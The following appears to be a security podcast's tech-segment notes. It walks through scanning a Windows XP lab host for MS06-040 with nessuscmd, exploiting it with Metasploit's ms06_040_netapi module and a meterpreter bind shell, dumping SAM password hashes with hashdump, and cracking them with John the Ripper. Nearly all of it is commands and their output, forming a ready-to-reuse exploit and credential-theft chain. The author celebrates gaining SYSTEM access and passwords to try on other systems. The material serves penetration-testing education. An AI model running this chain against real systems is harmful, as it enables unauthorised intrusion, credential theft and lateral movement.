Episode106 – PaulDotCom Security Weekly
Tech Segment: Probe, Exploit, and Crack for Free
On my Linux box (could be OS X, but I got errors when I ran nessuscmd under OS X, Ron will be emailing me as soon as he listens to the show 🙂 I run the nessuscmd, tell it to OS fingerprint with -O, Print out a full report with -V, use plugin-id 22194 (MS06-040), scan for TCP ports 139 and 445 with -sS 139,445, disable safe checking with -U, and to test host 192.168.10.139.
root@linux-box:~# /opt/nessus/bin/nessuscmd -O -V -i 22194 -v -sS -p139,445 -U 192.168.10.139
It reports:
Host 192.168.10.139 is up
Discovered open port netbios-ssn (139/tcp) on 192.168.10.139
Discovered open port microsoft-ds (445/tcp) on 192.168.10.139
[i] Plugin 11936 reported a result on port general/tcp of 192.168.10.139
[!] Plugin 22194 reported a result on port microsoft-ds (445/tcp) of 192.168.10.139
+ Results found on 192.168.10.139 :
– Host information :
[i] Plugin ID 11936
| Remote operating system : Microsoft Windows XP
| Microsoft Windows XP Service Pack 1
| Confidence Level : 99
| Method : MSRPC
|
|
|
| The remote host is running one of these operating systems :
| Microsoft Windows XP
| Microsoft Windows XP Service Pack 1– Port netbios-ssn (139/tcp) is open
– Port microsoft-ds (445/tcp) is open
[!] Plugin ID 22194
|
| Synopsis :
|
|
| Arbitrary code can be executed on the remote host due to a flaw
| in the
| ‘server’ service.
|
| Description :
|
|
| The remote host is vulnerable to a buffer overrun in the ‘Server’
| service
| which may allow an attacker to execute arbitrary code on the remote
| host
| with the ‘System’ privileges.
|
| Solution :
|
|
| Microsoft has released a set of patches for Windows 2000, XP and
| 2003 :
|
|
| http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx
|
|
|
| Risk factor :
|
|
| Critical / CVSS Base Score : 10.0
| (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
| CVE : CVE-2006-3439
| BID : 19409Sweet, I love vulnerabilities! They are sexy and exciting, especially MS006_040, because its just so delicious and begging to be devoured my metasploit. I have metasploit 3.1 installed in OS X:
/framework-3.1/trunk gordon$ ./msfconsole
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8′ 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 ‘Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo’ 8 `YooP8 `YooP’ 8YooP’ 8 `YooP’ 8 8
..:..:..:…..:::..::…..::…..:8…..:..:…..::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::=[ msf v3.2-release
+ — –=[ 286 exploits – 124 payloads
+ — –=[ 17 encoders – 6 nops
=[ 62 auxI want to tell metasploit to use the following module:
msf > use windows/smb/ms06_040_netapi
I want to set my payload to a standard meterpreter bind shell, which will let me inject into processes dynamically:
msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcpI then tell metasploit what to target:
msf exploit(ms06_040_netapi) > set RHOST 192.168.10.139
Here are what my options look like:
msf exploit(ms06_040_netapi) > show options
Module options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOST 192.168.10.139 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)Payload options:
Name Current Setting Required Description
—- ————— ——– ———–
DLL /Users/gordon/framework-3.1/trunk/data/meterpreter/metsrv.dll yes The local path to the DLL to upload
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local portExploit target:
Id Name
— —-
0 (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)Now I tell metasploit to execute my exploit with the above options:
msf exploit(ms06_040_netapi) > exploit
[*] Started bind handler
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] …
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] …
[*] Building the stub data…
[*] Calling the vulnerable function…
[*] Transmitting intermediate stager for over-sized stage…(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (81931 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.10.50:52375 -> 192.168.10.139:4444)To access session 1 I use the following command:
msf exploit(ms06_040_netapi) > sessions -i 1
I then tell meterpreter to load the Sam Juicer module:
meterpreter > use -m Sam
Then I issue the “hashdump” command:
meterpreter > hashdump
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::So then I copy and paste those results into my other directory with John The Ripper Installed:
paimei:~/downloads/john-1.7.0.2/run gordon$ cat > hashes.txt
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::Then I crack the passwords using the stock dictionary that comes with John:
paimei:~/downloads/john-1.7.0.2/run gordon$ ./john hashes.txt
Loaded 9 password hashes with no different salts (NT LM DES [64/64 BS MMX])
TEAMTED (TeamTed)
(SUPPORT_388945a0)
(Noone)
(Guest)
COM (Administrator:2)
guesses: 5 time: 0:00:00:02 (3) c/s: 11060K trying: TOUSCEL – TOUSMIR
Session abortedW00t! Now I have remote SYSTEM access to the target, and a username and password to try on other systems in less than 5 minutes. Sweet! I also have something that can be easily scripted and automated for testing my internal network, verifying vulnerabilities, all for free!